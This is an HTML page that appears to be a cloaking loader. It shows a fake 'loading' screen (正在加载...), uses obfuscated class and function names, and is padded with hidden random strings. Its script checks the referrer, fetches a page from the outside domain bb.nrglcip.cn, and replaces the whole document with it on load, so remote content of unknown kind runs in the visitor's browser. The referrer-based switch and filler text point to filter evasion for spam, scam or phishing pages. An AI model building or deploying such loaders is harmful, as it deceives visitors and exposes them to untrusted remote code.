<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .izcHNlhd {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .izcHNlhd .aGmrLDu {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .izcHNlhd .content {
            line-height: 50px;
            text-align: center
        }

        .izcHNlhd .img {
            width: 100%
        }

        .izcHNlhd .r9pmOxX {
            text-align: center
        }

        .izcHNlhd .r9pmOxX span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .izcHNlhd .r9pmOxX span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .izcHNlhd .r9pmOxX span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .izcHNlhd .r9pmOxX span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .izcHNlhd .r9pmOxX span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .izcHNlhd .r9pmOxX span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .izcHNlhd .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function zHQ7nwf1OlDD(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var pKnQle = zHQ7nwf1OlDD('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ pKnQle +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ pKnQle +".html?a=share";
		}
		
        aSKGpMQH=url+"#"+new Date().getTime();
        aSKGpMQH && function() {
            $.get(aSKGpMQH, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<p  style='display:none'>OvdU9xo5221gQSZGkYQMFd3wEXRp5YvWLgJXNHeICBNHVWUsG4LYWy2fqbXcR0wr5LgfM0Z</p>
<p  style='display:none'>OvdU9xo5221gQSZGkYQMFd3wEXRp5YvWLgJXNHeICBNHVWUsG4LYWy2fqbXcR0wr5LgfM0Z</p>
<p  style='display:none'>OvdU9xo5221gQSZGkYQMFd3wEXRp5YvWLgJXNHeICBNHVWUsG4LYWy2fqbXcR0wr5LgfM0Z</p>
<img  src='' style='display:none'>
<div style='display:none'>o1eWGceFfwJSdJCBaFHtYCFYYaUcTLIJHpdtrnT0j02ygd4Ueg1</div>
<b style='display:none' >d9P7tI8zzyO1LPtUNfOrmPIERxJe0PXWOWFwZk0iRZFjzAtcjTV2L</b>
<b style='display:none' >d9P7tI8zzyO1LPtUNfOrmPIERxJe0PXWOWFwZk0iRZFjzAtcjTV2L</b>
<p  style='display:none'>OvdU9xo5221gQSZGkYQMFd3wEXRp5YvWLgJXNHeICBNHVWUsG4LYWy2fqbXcR0wr5LgfM0Z</p><div class="izcHNlhd">
    <div class="aGmrLDu">
        <div class="r9pmOxX">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<div style='display:none'>MEDkelY8qyx4dDyCYFU9hlryj7urmTNWi9Dme2jNFjwYYYUFb4b6tZtBlNsAebbrZQFYTt6E</div>
<li style='display:none' >vJeG2qJGD19ttzLpppHH1Zu2d05ef3ha0gx3d7H</li>
<ul style='display:none' >wzQswvaYJMaEA5G99Y07bi1YkBn5Wvy6AFcHIFysfEKVJIPW8eU075OfFqqmzJh1ECFnUYHI4GJaZKi5FEf0IoEstbp</ul>
<h1 style='display:none' >oASee49xxEC</h1></body>
</html>